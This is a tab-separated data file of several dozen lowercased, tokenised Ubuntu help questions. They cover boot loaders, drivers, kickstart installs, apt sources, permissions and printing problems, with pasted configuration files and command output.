508011	what causes `` bash : /bin : is a directory '' every time a terminal is opened ?	this is initial screen i am getting on ubuntu 12.04 , when i open a terminal ( ctrl+alt+t ) : that is , the text on the terminal is : bash : /bin : is a directory chase @ chase-desktop : ~ $ gedit ~/.bashrc chase @ chase-desktop : ~ $ source ~/.bashrc bash : /bin : is a directory chase @ chase-desktop : ~ $ why is it appearing like this ? before that i worked on terminals and edited .bashrc so many times , but i did not get those messages .
508012	broadcom bcm4313 802.11bgn can connect to wifi but not to internet	i was running windows 8.1 and very recently switched to ubuntu . i am very new here but have read an enormous amount of posts pertaining to this problem . i have a thinkpad e530 . i can route the wifi through my phone and connect to the internet . my computer connects to the wifi but is not able to connect to the internet through the wifi . at some point using windows , i had to change wifi power settings and i think it is a similar problem here . i just have no idea how to fix it . any help will be much appreciated . sudo lshw -c network *-network description : wireless interface product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth1 version : 01 serial : 2c : d0:5a : fc : d0:08 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.30.223.141 ( r415941 ) ip=192.168.2.103 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : e4100000-e4103fff iwconfig wwan0 no wireless extensions . lo no wireless extensions . eth0 no wireless extensions . eth1 ieee 802.11abg essid : '' our-wifi-name '' mode : managed frequency:2.452 ghz access point : 44:94 : fc : a1 : c4 : b1 retry long limit:7 rts thr : off fragment thr : off power management : off usb0 no wireless extensions .
508014	laptop battery draining too fast . laptop is too hot	i have hp probook 4540s with cpu intel ( r ) core ( tm ) i3-3110m and gpu amd radeon hd 7650m and intel ( r ) hd graphics 4000 . ( intel速 ivybridge mobile also . ) ok , the problem is that the laptop is getting very hot when using ubuntu compared to when using windows . also , the battery drains faster compared to windows . so , how do i get rid of this problem ? btw : recently i managed to fix the brightness control problem on this laptop , but turning down the brightness of the screen does n't help much . i used the method involving : sudo gedit /usr/share/x11/xorg.conf.d/20-intel.conf ( it took me months to find this method . ) running ubuntu 14.04 lts x64 . my windows is windows 7 ultimate sp1 x64 , working fine . also , a while back i had windows 8.1 enterprise x64 installed there also . it had same problem with overheating , and low battery life . ( maybe a driver problem ? ? ? )
508015	installing ubuntu from customized live cd	so basically i modified an installation iso file . to be specific i added a kickstart file to it to automate the installation of ubuntu 14.04.1 i386 , i modified the isolinux/txt.cfg file to make it use the kickstart file . now , to test the installation-script i started a virtual machine and booted the disc image . a lot of text popped up , checking the state of the machine . i quess the installation begins with casper , since that is the first thing that is clearly readable . unfortunately it seems to check its file system on the floppy drive and gets stuck there , it repeatedly prints : /init : line 7 : ca n't open /dev/sr1 : no medium found eventually it stops and i find myself in the busybox . on launchpad.net people seemed to fix this problem by disabling the floppy drive . occasionally it did n't work for me , or i did it wrong . my question is now : is this a bug in casper or did i just fail to configure kickseed properly ? -- i should note , that i 'm new to ubuntu and have basically no idea regarding partitioning in kickstart , might there be the problem ? ks.cfg located in / # # generic kickstart template for ubuntu # platform : x86 and x86-64 # # system language lang en_us # language modules to install langsupport en_us # system keyboard keyboard us # system mouse mouse # system timezone timezone europe/vienna # root password rootpw -- disabled # initial user ( user with sudo capabilities ) user ubuntu -- fullname `` abc '' -- password abc # reboot after installation reboot # use text mode install text # install os instead of upgrade install # installation media cdrom # nfs -- server=server.com -- dir=/path/to/ubuntu/ # system bootloader configuration bootloader -- location=mbr # clear the master boot record zerombr yes # partition clearing information clearpart -- all -- initlabel # basic disk partition part / -- fstype ext4 -- size 1 -- grow -- asprimary part swap -- size 1024 part /boot -- fstype ext4 -- size 256 -- asprimary # system authorization infomation auth -- useshadow -- enablemd5 # network information network -- bootproto=dhcp -- device=eth0 # firewall configuration firewall -- disabled -- trust=eth0 -- ssh # do not configure the x window system skipx txt.cfg located in /isolinux default autoinstall label autoinstall menu label ^automatically install ubuntu kernel /casper/vmlinuz append file=/cdrom/preseed/ubuntu.seed boot=casper initrd=/casper/initrd.lz ks=cdrom/ks.cfg â
508016	computer restart when i choose windows 8 in grub	good morning , i installed windows 8 on an old p4 and it worked . then i install ubuntu 14.04.1 lts after having created a partition for it . everything went right and i can access ubuntu by choosing the option in grub . however , when i choose windows 8 , which is displayed , the screen goes black and the computer restart . this is an assembled machine , and the thing is that before the old p4 i used the very same hd with an i5 and uefi system . anyway , i formatted the hd as a msdos partition type , but i do n't know if there could be still something wrong . i looked for a solution online , but i did n't find anything . i tried also boot-repair , without any results . you can find the output script here : http : //paste.ubuntu.com/7955901/ running fdisk -l , i have : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d640a device boot start end blocks id system /dev/sda1 * 4096 734416895 367206400 7 hpfs/ntfs/exfat /dev/sda2 734416896 869385645 67484375 83 linux /dev/sda3 959365120 976773119 8704000 82 linux swap / solaris /dev/sda4 869386240 959365119 44989440 83 linux partition table entries are not in disk order and running cat /boot/grub/grub.cfg , i have # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi if [ `` $ { next_entry } '' ] ; then set default= '' $ { next_entry } '' set next_entry= save_env next_entry set boot_once=true else set default= '' 0 '' fi if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd0 , msdos2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos2 -- hint-efi=hd0 , msdos2 -- hint-baremetal=ahci0 , msdos2 61a7829b-acb3-4585-aab1-19ca85d19e68 else search -- no-floppy -- fs-uuid -- set=root 61a7829b-acb3-4585-aab1-19ca85d19e68 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=1024x768 load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=10 else if [ x $ feature_timeout_style = xy ] ; then set timeout_style=menu set timeout=10 # fallback normal timeout code in case the timeout_style feature is # unavailable . else set timeout=10 fi fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-61a7829b-acb3-4585-aab1-19ca85d19e68 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos2 -- hint-efi=hd0 , msdos2 -- hint-baremetal=ahci0 , msdos2 61a7829b-acb3-4585-aab1-19ca85d19e68 else search -- no-floppy -- fs-uuid -- set=root 61a7829b-acb3-4585-aab1-19ca85d19e68 fi linux /boot/vmlinuz-3.13.0-32-generic root=uuid=61a7829b-acb3-4585-aab1-19ca85d19e68 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-32-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-61a7829b-acb3-4585-aab1-19ca85d19e68 ' { menuentry 'ubuntu , with linux 3.13.0-32-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-32-generic-advanced-61a7829b-acb3-4585-aab1-19ca85d19e68 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos2 -- hint-efi=hd0 , msdos2 -- hint-baremetal=ahci0 , msdos2 61a7829b-acb3-4585-aab1-19ca85d19e68 else search -- no-floppy -- fs-uuid -- set=root 61a7829b-acb3-4585-aab1-19ca85d19e68 fi echo 'loading linux 3.13.0-32-generic ... ' linux /boot/vmlinuz-3.13.0-32-generic root=uuid=61a7829b-acb3-4585-aab1-19ca85d19e68 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-32-generic } menuentry 'ubuntu , with linux 3.13.0-32-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-32-generic-recovery-61a7829b-acb3-4585-aab1-19ca85d19e68 ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos2 -- hint-efi=hd0 , msdos2 -- hint-baremetal=ahci0 , msdos2 61a7829b-acb3-4585-aab1-19ca85d19e68 else search -- no-floppy -- fs-uuid -- set=root 61a7829b-acb3-4585-aab1-19ca85d19e68 fi echo 'loading linux 3.13.0-32-generic ... ' linux /boot/vmlinuz-3.13.0-32-generic root=uuid=61a7829b-acb3-4585-aab1-19ca85d19e68 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-32-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry 'memory test ( memtest86+ ) ' { insmod part_msdos insmod ext2 set root='hd0 , msdos2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos2 -- hint-efi=hd0 , msdos2 -- hint-baremetal=ahci0 , msdos2 61a7829b-acb3-4585-aab1-19ca85d19e68 else search -- no-floppy -- fs-uuid -- set=root 61a7829b-acb3-4585-aab1-19ca85d19e68 fi knetbsd /boot/memtest86+.elf } menuentry 'memory test ( memtest86+ , serial console 115200 ) ' { insmod part_msdos insmod ext2 set root='hd0 , msdos2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos2 -- hint-efi=hd0 , msdos2 -- hint-baremetal=ahci0 , msdos2 61a7829b-acb3-4585-aab1-19ca85d19e68 else search -- no-floppy -- fs-uuid -- set=root 61a7829b-acb3-4585-aab1-19ca85d19e68 fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry 'windows 8 ( loader ) ( on /dev/sda1 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-25246fca10c23246 ' { insmod part_msdos insmod ntfs set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 25246fca10c23246 else search -- no-floppy -- fs-uuid -- set=root 25246fca10c23246 fi parttool $ { root } hidden- drivemap -s ( hd0 ) $ { root } chainloader +1 } set timeout_style=menu if [ `` $ { timeout } '' = 0 ] ; then set timeout=10 fi # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # i hope you can help me , because the thing is very annoying
508024	bittorrent sync : permission denied ?	every time i try to run the bittorrent sync binary , downloaded from here , i get a permission denied error regardless whether try running it as my user or as root . in particular , i get juan @ server : ~/.btsync $ ./btsync -bash : ./btsync : permission denied and root @ server : /home/juan/.btsync # ./btsync -bash : ./btsync : permission denied i 've already changed permission of both btsync the folder containing it to 777 . also my user , juan , is the owner of both the folder and btsync . this only seems to happen with btsync and not with other programs . i 've tried re-downloading btsync . last bit of , maybe , relevant info : a while back another user attempted ( but messed up ) to install btsync using apt-get which resulted not on btsync being installed , but this package which is not written by the same people and builds on btsync . i attempted to remove it as best as i could using juan @ server : ~/.btsync $ sudo apt-get purge btsync* juan @ server : ~/.btsync $ sudo apt-get -- purge autoremove but maybe something remains lingering somewhere . what else can cause permission denied errors ; what can i try ? thanks in advance . edit : here 's the relevant output from ls btsync : -rwxrwxrwx 1 juan juan 5957720 jul 30 11:08 btsync containing folder drwxrwxrwx 2 juan juan 4096 aug 7 10:08 .btsync with the `` .btsync '' highlighted in green . edit 2 : i downloaded the x64 version , here 's the link . i think that it 's the correct one for my architecture , here 's what uname -a returns linux fileserver 3.11.0-26-generic # 45-ubuntu smp tue jul 15 04:02:06 utc 2014 x86_64 x86_64 x86_64 gnu/linux edit 3 : here 's what file btsync returns btsync : elf 64-bit lsb executable , x86-64 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , buildid [ sha1 ] =0xff654e3f8d393a11bc42f4e23cd96478fdda613c , stripped edit 4 : binary , not script , thanks eliah kagan , as it 's pretty transparent i 'm new to linux .
508029	ubuntu 14.04 stuck on shutdown	my problem is that when i try to shutdown computer , it sticks at the shutdown screen and these are the only lines i can see : wait-for-state stop/waiting stoping gnustep distributed object mapper : gdomap . * stopping rsync daemon rsync [ ok ] * stopping speech dispatcher speech-dispatcher [ ok ] and thats all . i 'm using gnome 3.10 ( had 3.12 but downgraded because of some problems ) if it has something to do with that . rebooting computer works ; it does n't stick .
508032	updating genuine repositories fails in trusty tahr	i was installing ubuntu 14.04.1 lts x64 in a virtual box running on windows 8 x64 . on running installer i have n't entered anything into dialog asking for some required proxy setup . the vm is attached to the web using bridged networking by default . this vm is used for testing some inhouse development of an installer script . thus i 've taken a snapshot after basic installer has been finished . i can properly boot that vm and always revert to that snapshot for retrying our own installer . those tests are always starting this way : revert vm to initial snapshot clone installer from remotely hosted svn using git svn ( always succeeding ) invoke cloned installer that installer is used to invoke apt-get update on first launch and again once a day on repeated invocations . in addition it is invoking apt-get upgrade once a day and uses apt-get install < somepackage > for installing required but missing dependencies . the installer is n't adding any ppa currently . the snapshot is n't listing any ppas either . however , even in a vm freshly reverted to that snapshot the installer 's initial invocation of apt-get update occasionally fails due to not finding some repositories or having mismatching hash sums on selected repositories . due to this issue we currently ca n't advise our customers to upgrade existing installations to ubuntu 14.04 lts though it 's including several highly beneficial improvements ( e.g . in supporting lxc ) . a currently proven solution is waiting 30-60 minutes reverting vm to initial snapshot again relaunching installer checking if updating repos succeeds or not i 'm quite sure this is n't related to our office 's web connectivity for it is occurring in different places , at different times and days , while streaming from the web , skyping with audio/video etc . without any problems . here is my /etc/apt/sources.list : # # deb cdrom : [ ubuntu-server 14.04.1 lts _trusty tahr_ - release amd64 ( 20140722.3 ) ] / trusty main restricted # deb cdrom : [ ubuntu-server 14.04.1 lts _trusty tahr_ - release amd64 ( 20140722.3 ) ] / trusty main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //de.archive.ubuntu.com/ubuntu/ trusty main restricted deb-src http : //de.archive.ubuntu.com/ubuntu/ trusty main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //de.archive.ubuntu.com/ubuntu/ trusty-updates main restricted deb-src http : //de.archive.ubuntu.com/ubuntu/ trusty-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //de.archive.ubuntu.com/ubuntu/ trusty universe deb-src http : //de.archive.ubuntu.com/ubuntu/ trusty universe deb http : //de.archive.ubuntu.com/ubuntu/ trusty-updates universe deb-src http : //de.archive.ubuntu.com/ubuntu/ trusty-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //de.archive.ubuntu.com/ubuntu/ trusty multiverse deb-src http : //de.archive.ubuntu.com/ubuntu/ trusty multiverse deb http : //de.archive.ubuntu.com/ubuntu/ trusty-updates multiverse deb-src http : //de.archive.ubuntu.com/ubuntu/ trusty-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //de.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse deb-src http : //de.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu trusty-security main restricted deb-src http : //security.ubuntu.com/ubuntu trusty-security main restricted deb http : //security.ubuntu.com/ubuntu trusty-security universe deb-src http : //security.ubuntu.com/ubuntu trusty-security universe deb http : //security.ubuntu.com/ubuntu trusty-security multiverse deb-src http : //security.ubuntu.com/ubuntu trusty-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu trusty partner # deb-src http : //archive.canonical.com/ubuntu trusty partner # # uncomment the following two lines to add software from ubuntu's # # 'extras ' repository . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu trusty main # deb-src http : //extras.ubuntu.com/ubuntu trusty main there are n't any files in /etc/apt/sources.list.d/ ...
508033	recovery ntfs file from previuse partitions	yesterday i installed ubuntu 14.04 , unfortunately i used the whole hdd and ubuntu removed everything even windows 7 from my hdd . can i retrieve my files ?
508036	use solarized or similar in ubuntu server	it 's possible to use solarized color scheme ( or similar ) in a ubuntu server 14.04 cli only ?
508037	ubuntu 14 installed on external hard drive random crashes	i have installed ubuntu 14 onto my external hard drive and everything initially works great . however after an apparently random amount of time ( although this has happened every time i have been running ubuntu on the hard drive ) everything completely freezes and i have to do a hard restart . can anyone suggest any reasons why this might be happening or how i can go about fixing this ?
508038	how to uninstall ubuntu 14.04 from windows7 [ dual boot ] . without using windows 7 dvd for master boot fix	i have been searching for a while to uninstall ubuntu 14.04 . i will reinstall the fresh copy of ubuntu 14.04 in another partition which i will be doing after few months till then i will use windows 7 . but when i searched , i found that i will need windows 7 disc to repair the boot loader option . i do n't have the disc , as my laptop ( vaio ) came with windows 7 home basic preinstalled . i know how to uninstall but i need to uninstall without the windows 7 dvd or else i guess i will have to do a factory reset which i do n't want . suggest me with any alternate solution if available .
508040	updated iso with all the updates already applied for lts release ?	i need to get an ubuntu iso in which the updates are already applied so that i wont have to install the updates immediately after the installation . ( the latest iso is unbootable in my dell machine question ( screen flickers on live boot : dell inspiron 1440 : ubuntu 12.04 / 13.10 / 14.04 ) and i just want to check if an updated iso can do anything better ) this question is similar to can i get an updated iso with all the updates already applied ? the answer hints that an updated iso may be available for an lts release . how to get this ? i tried updating my persistant live usb image from update manager . but due to some reason or other , some updates are failing and the usb ends up unbootable .
508043	how to create a desktop entry for an application located in the user space ?	i compiled the latest qgis sources into user space ~/bin/qgis . i can start the application from the command line running ~/bin/qgis/bin/qgis . now i want to have application launcher entry . so i copied the .desktop file of the qgis distribution installation : cp /usr/share/applications/qgis.desktop ~/.local/share/applications next i renamed it : cd ~/.local/share/applications mv qgis.desktop qgis-custom.desktop next i edited the paths for tryexec and exec in the file : [ desktop entry ] type=application name=qgis desktop latest version=1.0 genericname=geographic information system genericname [ ar ] =نظام المعلومات الجغرافي # other translations omitted for brevity genericname [ uz ] =geografik axborot tizimi icon=qgis tryexec=/home/jjd/bin/qgis/bin/qgis exec=/home/jjd/bin/qgis/bin/qgis % f terminal=false startupnotify=false categories=qt ; education ; science ; geography ; mimetype=application/x-qgis-project ; image/tiff ; image/jpeg ; image/jp2 ; application/x-raster-aig ; application/x-raster-ecw ; application/x-raster-mrsid ; application/x-mapinfo-mif ; application/x-esri-shape ; keywords=map ; globe ; postgis ; wms ; wfs ; ogc ; osgeo ; ( old .desktop file ) finally i try to start it from the unity launcher . nothing happens ... . one thing that i remember which is different is that i have to export the library path in the shell : export ld_library_path= $ home/bin/qgis/lib i guess this is missing for the application launcher entry .
508046	ubuntu does n't start.after booting from a dvd it appears a blank screen with some white lines .	i am booting ubuntu 32 bit from a dvd.when i tried to run ubuntu first it run successfully but from the second time it didn't.i tried with changing booting option from bios but no result.i am also sometimes getting some error like no live file system detected .and i saw all the disks were unmounted at the first use .
508049	captstatusui -p lbp3300 error in `captstatusui ' : double free or corruption	i tried installing canon lbp3300 printer in ubuntu 14.04 and i am getting the following error captstatusui -p lbp3300 error in `captstatusui ' : double free or corruption ( fasttop ) : 0x000000000175f5e0 *** aborted ( core dumped ) and the printer stops .
508052	switch off search highlighting in gvim	when i do search in gvim ( package gnome-vim ) , the search results are highlighted . how can i turn-off this highlighting when i do n't need it any longer ? now it looks like persistent .
508054	lampp mysql linux permissions	i decided to go safe . i am no linux expert either . i edited my.cnf and gave the mysql username ( instead of nobody ) i set it to 'nugget ' . i then added a user named nugget and added it to the group named apache . apache is my webserver 's username and is set in httpd.conf . i also chmod 'd the files inside /opt/lampp/var/mysql to be root : apache owned with 770 mysql wo n't start now ... what have i done wrong ?
508055	do all the daemons indicated by configfiles/scripts/links in /etc/ { init , init.d } start at the boot ?	are all the daemons ( services ) indicated by configuration-files/scripts/links in /etc/init/ , /etc/init.d/ meant to start at the boot ; so can i assume those directories being like start-up directory for the processes during the boot-up ? keeping in mind multiprocessing , will stopping some or more of those from getting to start at boot actually speed-up the system boot time ? are the processes just triggered to start or is there some return code checking going on too ?
508056	which port and ip addresses are used while installing new ubuntu system	as we know that when , we install the new ubuntu system and if we are connected to the internet then it can fetches packages from ubuntu repository . so i have question which port and ip address is used while fetching those packages .
508059	black borders after installing calalyst 14.4	have just done a hardware upgrade with existing ubuntu 14.04 , including an amd apu a10-7700k . but i found that the 3 offerings in additional drivers did n't work properly so i could n't start the control centre , and couldnât get opencl . so i installed the catalyst 14.4 package from amd ( which was n't too hard ! ) , but now i get a black border on my screen . my monitor is a samsung 22 '' led s22d300 . otherwise all seems ok . i found some instructions at wiki.cchtml.com but did n't work . playing with the settings in control centre did n't work either . anyone else have this problem ? how to fix it ?
508061	why wo n't .pdf files containing transparent elements print correctly ?	i have recently encountered a problem printing .pdf files containing transparent elements . i first noticed it when printing a document created with latex that included embedded .png images with alpha channels and embedded .pdf figures with transparent elements . the document would look fine on the screen but when printed the pages containing embedded graphics would appear to be bitmapped at a low resolution . i later found this would also occur when printing some of the .pdf figures individually so the problem is not specifically to do with latex . i also found that the documents will generally print ok with adobe reader in linux , but they take a very long time to print . the documents also appear to print ok with adobe reader in windows . this suggests the problem lies with the evince ( the default .pdf viewer ) or something in the printing sub-system between document and printer . i speculate that adobe reader in linux is unaffected by the problem because it rasterizes the page images itself at an acceptable resolution or otherwise communicates with the printer differently . unfortunately i do n't know enough about ubuntu 's print sub-system to locate the source of the problem but it definitely seems like a bug . i am using ubuntu 12.04 , evince document viewer 3.4.0 using poppler/cairo ( 0.18.4 ) and cups 1.5.3 there are a number of related questions but the following two are the most relevant : flattening pdf transparency - the best answer here is to use acrobat professional in windows to flatten the transparency , but i do n't have easy access to this software . why do some vector graphics included into a document force rasterization of the whole page and subsequently ruin the look of the text in cups ? - the best answer here is to use ghostscript to convert the .pdf to a version that does n't support transparency effects , but this simply rasterizes the file rather than flattening the transparency . none of the answers to these questions really get to the root of the problem , i.e . how come the files print ok in adobe reader in windows ( and in linux , albeit slowly ) but not with the default .pdf viewer evince ? my own workaround is simply to ensure there are no transparent elements in the .pdf figures in the first place . where transparent effects are essential i save the figures as .png at a sufficiently high resolution for printing . if necessary any .png alpha channels can be removed using gimp . i have found no way to flatten a .pdf in linux without rasterizing it . can anyone suggest a resolution or at least a better workaround ?
508065	dual boot extend partition	i am really new to ubuntu , and i wanted to extend my dual boot ubuntu partition , but there is no option to which i can extend it . i have run gparted , then i swapoff the linux-swap . i already have an unallocated space but the resize function is not extendable . what i wanted is to resize the ubuntu hdd which i think is dev/sda6 . here is the image : when clicking resize : what am i doing wrong ? thanks for the help . hope you could guide me , because i dont to ruin my boot . thank you .
508067	opencl problem after installing catalyst 14.4	have just done a hardware upgrade with ubuntu 14.04 , using an amd apu a10-7700k , and installed catalyst 14.4 package from amd website . i now have a problem with boinc 7.2.42 in that it does n't see the gpu opencl on startup . however , when i use bum to deactivate and then reactivate it works fine . is this a reappearance of the old 'sleep 6 ' trick that we used to need with earlier boincs ? if so , does anyone know/remember how to do it ? or this there another answer ? if it 's relevant , if i reinstall boinc i get a line '/usr/lib/i386-linux-gnu/libopencl.so.1 is not a symbolic link ' .
508068	inaccessable re-writers ... ich9r driver problem ?	my ubuntu 14.04 os is not 'seeing ' my two re-writers , which are connected to gsata , set to ide in the bios . on gigabyte 's website , they say go to intel for drivers or third party . i can only find ich9r drivers for linux raid servers using these chips . are these drivers available for the following ? intel sata raid/ahci driver gigabyte sata2 preinstall driver ( for ahci / raid mode ) i would appreciate any suggestions . thanks for your help . mb ... gigabyte x48t-dq6 cpu ... q6600 8 gb ram
508069	how to uninstall ubuntu 14.04 lts from windows 8 dual boot	my system is running windows 7 , windows 8 and ubuntu 12 . i recently installed ubuntu 14.04 . i would like to uninstall both versions of ubuntu and then freshly install ubuntu 14.04 lts . i do n't have any windows recovery disks or installation media .
508070	how to install wifi driver on lenovo w540	how to install wifi and network drivers on my lenovo w540 thinkpad
508071	open raw image files in gimp	is there any plugin for gimp to edit raw photo files ? i tried ufraw which is quite popular , but its gui sucks to the degree of being unusable . moreover , i want to edit my files in gimp , using gimp tools that i am used to , not in ufraw-like plugin . any ideas ? i am not interested in stand-alone applications like i.e . raw therappe . my goal is to edit raw files in gimp the same way as any other image file .
508073	problem with java installation	when i type following command ramesh @ ramesh-h61m-s2p-b3 : ~ $ sudo apt-get install openjdk-6-jdk getting error as , reading package lists ... done building dependency tree reading state information ... done package openjdk-6-jdk is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : apt e : package 'openjdk-6-jdk ' has no installation candidate how to resolve it ?
508074	error with ubuntu on virtual box	i run ubuntu with virtual box . however while running a updat of the system , my computer crashed . since then my ubuntu on virtual box is not working any more the icons , e.g . firefox , are not displayed properly anymore and i have no cursor . i also get the following error : sorry ubuntu 12.04 has experienced an internal error . what should i do , reinstall virtual box completely ?
508079	virtualbox -- build -- headless returns error	failed to open the x11 display . this is related , i believe , to the other issue i 'm having with the server not putting anything out to the display after a successful install . i have a post on linuxquestionsorg that is unresolved relating to no display after an install . [ no display after install on dell 1750 servers ] i have 2 of these systems , both yield the same results . dell 1750 , several distribution installs attempted . ( ubuntu , debian , centos , opensuse ) all complete without error , reboot , monitor is unable to display current resolution ( tried multiple monitors ) installation of opensuse gave the option to use specific resolutions during the install , i tried them all . i ran lspci and found the video is : amd/ati rage xl pci rev27 . several other posts relate to no video but few seem to be resolved . interesting topic .
508081	linux : data extraction from text file	i have a text file in which thousands of data is there . eg . id=row_value profile=row_value name=row_value email=row_value address=row_value id=row_value2 profile=row_value2 name=row_value2 email=row_value2 address=row_value2 . . . . . . . . . i want to extract all name and email from that file . eg . name=row_value email=row_value name=row_value2 email=row_value2 . . . . . . . . . note : note the new line after each name and email pairs .. i know it will be done in some linux commands like grep , sed , awk etc .. i 'm noob in linux commands and please help me regarding this ..
508083	how to uninstall ns-2.35 from ubuntu 12.04	i am new to ns2 , i 'd like to uninstall my ns-allinone-2.35 package , from ubuntu 12.04lts i followed these steps : sudo aptitude purge ns-allinone-2.35 sudo apt-get purge ns-allinone-2.35 sudo dpkg -p ns-allinone-2.35 . but after going through these procedures too , i 'm able to execute ns , i 'd like to how to uninstall a complete ns-allinone-2.35 package yours solutions are welcome ! ! ! ! ! thanks in advance
